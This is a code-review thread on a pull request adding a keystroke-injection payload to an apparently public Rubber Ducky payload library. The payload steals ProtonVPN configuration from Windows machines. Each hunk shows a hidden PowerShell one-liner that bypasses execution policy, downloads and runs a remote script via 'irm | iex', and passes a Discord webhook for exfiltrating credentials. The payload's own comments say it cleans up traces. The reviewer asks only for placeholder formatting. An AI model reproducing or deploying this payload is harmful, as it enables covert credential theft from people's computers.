### PR TITLE
ProtonVPN config

### PR DESCRIPTION
**Pull request by aleff-github**

### CODE REVIEW

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt [hunk 1]
```diff
@@ -0,0 +1,34 @@
...
+REM Version: 1.0
+REM Category: Credentials, Exfiltration
+REM Requirements: ProtonVPN user logged at least one time and internet connection
+REM 
+
+
+DELAY 2000
+GUI r
+DELAY 250
+STRINGLN powershell -w h -ep bypass $discord='<your-wehbook-here>';irm bit.ly/ProtonVPN-config-raw | iex
```
Comment (dallaswinger) [inline payloads/library/exfiltration/ProtonVPN-config/payload.txt:34]: Please see guidelines regarding **your-webhook-here**:
https://github.com/hak5/usbrubberducky-payloads#payload-configuration

Comment (aleff-github) [reply payloads/library/exfiltration/ProtonVPN-config/payload.txt]: [a37db33c40b1afbabe15f11d85389eb26e56a15d] Update

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt [hunk 2]
```diff
@@ -0,0 +1,40 @@
...
+REM REQUIRED - Provide your url WEBHOOK
+DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass $discord='
+STRING WEBHOOK
+STRING ';irm bit.ly/Hak5ProtonVPN-config | iex
```
Comment (dallaswinger) [inline payloads/library/exfiltration/ProtonVPN-config/payload.txt:39]: change the link to a DEFINE please. something like:
DEFINE STAGED_PAYLOAD example.com

do not use our github repo as a CDN by linking to your source here; see -
https://github.com/hak5/usbrubberducky-payloads#staged-payloads

**Comment by dallaswinger** [comment]
Appreciate you updating. Left my last requested change as a comment just now

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt (hunk 2 above)
Comment (aleff-github) [reply payloads/library/exfiltration/ProtonVPN-config/payload.txt]: Solved in 839f6dd6b232dbbfa9a98165db9b6021c6d3c3d7

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt [hunk 3]
```diff
@@ -0,0 +1,42 @@
...
+REM              - and so on...
+REM              Then it cleans up traces of what you have done after.
+REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
+REM Version: 1.0
+REM Category: Credentials, Exfiltration
+REM Requirements: ProtonVPN user logged at least one time and internet connection
+REM 
+
+REM REQUIRED - Provide your url WEBHOOK
+DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
```
Comment (dallaswinger) [inline payloads/library/exfiltration/ProtonVPN-config/payload.txt:31]:
```
REM REQUIRED - Provide your url WEBHOOK- https://discordapp.com/api/webhooks/<webhook_id>/<token> 
DEFINE WEBHOOK example.com
```

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt [hunk 4]
```diff
@@ -0,0 +1,42 @@
...
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass $discord='
+STRING WEBHOOK
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+STRING ';irm example.com | iex
```
Comment (dallaswinger) [inline payloads/library/exfiltration/ProtonVPN-config/payload.txt:41]:
```
REM Reply example.com with YOUR LINK to where you have hosted ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
```

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt (hunk 3 above)
Comment (aleff-github) [reply payloads/library/exfiltration/ProtonVPN-config/payload.txt]: bab9822eecbd2c2e0aaf101ce249d1a15c5dd5cd

File: payloads/library/exfiltration/ProtonVPN-config/payload.txt (hunk 4 above)
Comment (aleff-github) [reply payloads/library/exfiltration/ProtonVPN-config/payload.txt]: bab9822eecbd2c2e0aaf101ce249d1a15c5dd5cd

**Pull request merged**